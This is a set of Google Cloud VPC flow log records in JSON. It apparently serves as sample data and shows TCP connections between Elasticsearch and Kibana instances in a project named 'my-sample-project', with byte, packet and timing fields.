-{"insertId":"y4wffpfk2eror","jsonPayload":{"bytes_sent":"158811","connection":{"dest_ip":"203.0.113.134","dest_port":33968,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965119632Z","packets_sent":"69","reporter":"SRC","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480430427Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erob","jsonPayload":{"bytes_sent":"13455","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33880},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821047175Z","packets_sent":"81","reporter":"DEST","rtt_msec":"252","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470071135Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erox","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"203.0.113.12","dest_port":57300,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:22.156322353Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:22.044604322Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eroc","jsonPayload":{"bytes_sent":"71014","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65315},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220720811Z","packets_sent":"728","reporter":"DEST","rtt_msec":"210","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.844068405Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erok","jsonPayload":{"bytes_sent":"60749","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33538},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"362","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eros","jsonPayload":{"bytes_sent":"160451","connection":{"dest_ip":"203.0.113.134","dest_port":33880,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821138391Z","packets_sent":"66","reporter":"SRC","rtt_msec":"252","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470071135Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erod","jsonPayload":{"bytes_sent":"169173","connection":{"dest_ip":"10.87.40.76","dest_port":33574,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"64","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466811088Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2ero6","jsonPayload":{"bytes_sent":"118762","connection":{"dest_ip":"203.0.113.58","dest_port":65315,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220720811Z","packets_sent":"615","reporter":"SRC","rtt_msec":"210","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.844068405Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eron","jsonPayload":{"bytes_sent":"11137","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33576},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"96","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510464198Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eroy","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":57300},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:22.156322353Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:22.044604322Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erof","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"203.0.113.12","dest_port":54662,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:12.142682672Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:12.027895189Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erov","jsonPayload":{"bytes_sent":"11674","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33572},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"96","reporter":"DEST","rtt_msec":"335","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470754779Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erop","jsonPayload":{"bytes_sent":"62831","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33540},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789112562Z","packets_sent":"346","reporter":"DEST","rtt_msec":"313","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074813982Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erou","jsonPayload":{"bytes_sent":"15169","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33574},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"93","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466811088Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eroj","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":54662},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:12.142682672Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:12.027895189Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erow","jsonPayload":{"bytes_sent":"64588","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33560},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"362","reporter":"SRC","rtt_msec":"11","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075859688Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erot","jsonPayload":{"bytes_sent":"67315","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33536},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565156020Z","packets_sent":"354","reporter":"DEST","rtt_msec":"194","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150481417Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eroq","jsonPayload":{"bytes_sent":"175633","connection":{"dest_ip":"10.87.40.76","dest_port":33576,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"67","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510464198Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2ero5","jsonPayload":{"bytes_sent":"116981","connection":{"dest_ip":"203.0.113.134","dest_port":33540,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789112562Z","packets_sent":"234","reporter":"SRC","rtt_msec":"313","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074813982Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eroo","jsonPayload":{"bytes_sent":"67789","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33690},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:48.542406314Z","packets_sent":"344","reporter":"DEST","rtt_msec":"196","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075867049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"ptjoddfhmrhg9","jsonPayload":{"bytes_sent":"136166","connection":{"dest_ip":"203.0.113.134","dest_port":33538,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565124617Z","packets_sent":"245","reporter":"SRC","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074952616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgh","jsonPayload":{"bytes_sent":"68262","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65257},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220614265Z","packets_sent":"718","reporter":"DEST","rtt_msec":"220","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.403388091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgj","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":52328},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:20.952481728Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:20.842840991Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgr","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":59790},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:50.702194466Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:50.590894439Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgn","jsonPayload":{"bytes_sent":"73681","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65317},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"728","reporter":"DEST","rtt_msec":"62","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.740491697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhga","jsonPayload":{"bytes_sent":"92566","connection":{"dest_ip":"203.0.113.58","dest_port":65317,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"596","reporter":"SRC","rtt_msec":"62","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.740491697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgk","jsonPayload":{"bytes_sent":"66094","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33692},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565137912Z","packets_sent":"360","reporter":"DEST","rtt_msec":"181","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.558259934Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgm","jsonPayload":{"bytes_sent":"4900","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65262},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220741828Z","packets_sent":"542","reporter":"DEST","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.251430011Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 